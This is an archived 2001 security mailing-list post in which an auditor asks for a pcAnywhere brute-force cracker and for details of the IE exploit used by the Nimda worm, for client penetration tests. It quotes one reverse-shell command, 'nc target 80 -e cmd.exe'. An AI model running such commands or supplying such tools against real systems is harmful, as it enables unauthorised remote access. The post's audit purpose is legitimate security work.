IE/Outlook/Pcanywhere

From: Gary O'leary-Steele (GaryO@sec-1.com)
Date: Mon Sep 24 2001 - 02:44:26 PDT

    Hi,

    Is there a brute force cracker available for Pcanyware? I have identified a
    PCanywhere server using Nmap but many of the commercial scanners have not
    recognized the pcanywhere server and therefore I need a specific tool for
    the job.

    I am also putting together a archive of useful IE/Outlook exploits which
    execute Netcat or similar to demonstrate "hacking the internet user" as part
    of our security auditing services. The security focus search engine seems to
    be experiencing problems at the mo so as anyone got detailed information on
    the new(ish) IE exploit as used by the nimda worm so I can implement it in a
    non-viral way.

    Many of our clients are SME's and they generally don't host many services
    (in the uk anyway) and the day of misconfigured IIS servers are dwindling
    due the wake up call issued from code red etc. In our opinion the use of
    executing an inside-out shell exploited using client side IE exploits (such
    as nc target 80 -e cmd.exe) will be the first attack attempted (against
    smaller sme's) by script kiddies / ex-employees than port scanning the
    firewall/router to find a vulnerable proxy with iis enabled etc (and all the
    usual vulnerabilities left by an overworked IT admin). therefore I want to
    put an archive together of code to exploit these weaknesses to expose these
    vulnerabilities from a remote audit perspective rather than taking a box
    with ISS on site to find the misconfigured workstations.

    Thanx in advance for your assistance

    Kind Regards
    Gary O'leary-Steele
    Sec-1

    This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
    Service. For more information on SecurityFocus' SIA service which
    automatically alerts you to the latest security vulnerabilities please see:
    https://alerts.securityfocus.com/